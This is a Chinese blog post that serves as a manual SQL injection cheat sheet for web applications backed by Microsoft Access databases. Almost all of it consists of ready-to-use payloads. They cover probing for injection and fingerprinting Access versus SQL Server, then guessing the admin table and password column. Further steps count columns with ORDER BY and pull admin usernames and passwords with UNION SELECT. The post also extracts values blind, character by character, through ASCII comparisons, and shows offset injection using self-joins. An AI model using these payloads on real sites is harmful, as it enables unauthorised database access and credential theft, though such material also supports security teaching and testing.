美文网首页
Access注入

Access注入

作者: Sec小玖 | 来源:发表于2017-12-15 20:27 被阅读0次

1. 判断是否存在注入


 '  

and 1=1

and 1=2

or 1=2

or 1=2

' and '1'='1

' and '1'='2


2.判断数据库类型


and exists (select * from msysobjects) > 0        //判断access

and exists (select * from sysobjects) > 0            //判断sqlserver


3.判断数据库表


and exists (select * from admin)                  //判断是否有admin表

4.判断字段名称

and exists (select password from admin)            //判断admin表中是否有password字段

5.判断字段长度

order by 10            //判断字段长度为10

6.使用联合查询获取想要的值

and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin               

7.获取具体字段值

and 1=2 union select 1,2,admin,4,password,6,7,8,9,10 from admin    


其他查询语句:

1.判断admin字段的长度

and (select len(admin) from admin) = 5

and (select len(admin) from admin) > 5

2.判断password字段的长度

and (select len(password) from admin) = 5

3.判断admin字段的第一个字符的ASCII值

and (select top 1 asc(mid(admin,1,1)) from admin) > 100

4.判断admin字段的第二字符的ASCII值

and (select top 1 asc(mid(admin,2,1)) from admin) > 100

5.判断admin字段的第三个字符的ASCII值

and (select top 1 asc(mid(admin,3,1)) from admin) > 100


偏移注入:

主要用于解决能够猜解到表名,而列名猜解不到的情况。

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

1.使用*替换22

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin

2.使用*替换21

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin

3.使用*替换20

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,* from admin

4.一次往前替换,直到不报错为止

5.带入公式计算

22-16=6

10+6*2=22

union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)

4+6*3=22

union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)

将随机爆破出数据库中字段的值。

相关文章

  • access/mssql手动注入

    一.本文介绍 1、本文介绍access手工注入、mssql注入获取webshell 二.手动注入 1、access...

  • Access注入

    1. 判断是否存在注入 ' and 1=1 and 1=2 or 1=2 or 1=2 ' and '1'='1 ...

  • 小迪16期-20170305

    第三天:Sql注入技巧篇 1.Sql注入之access注入 access数据库结构数据库表名数据库列名数据 1.a...

  • 小迪16期-20170401

    第六天:MySQL防注入研究 MySQL头注入(http)Access偏移注入CSRF攻击 MySQL防注入 过滤...

  • 小迪16期-20170226

    第二天:Sql注入集锦篇 1.Sql注入之access注入 2.Sql注入之mysql注入 3.Sql注入之mss...

  • ACCESS手工注入

    判断是否存在注入 找到一个类似于http://www.xxx.com/xx.asp?id=xxxx的URL后(用G...

  • Access注入攻击

    手工找注入点 漏洞链接地址为:http://192.168.60.85:92/news_view.asp?id=5...

  • Access注入——偏移注入

    偏移注入简介 使用场景 一些无法查询的列名,比如权限不足的 知道表名却不知道字段 使用偏移查询主要查询字段及内容等...

  • access、mssql、mysql、oracle数据库手工注入

    Access注入: *.mdb形式 判断注入点: 1. '号出现报错(页面显示不完整)——容错性能 2. and ...

  • SQLMAP注入教程方法详解:

    一、SQLMAP通过Access注入: 1.猜解参数是否能注入: http://www.test.com/inde...

网友评论

      本文标题:Access注入

      本文链接:https://www.haomeiwen.com/subject/vazdwxtx.html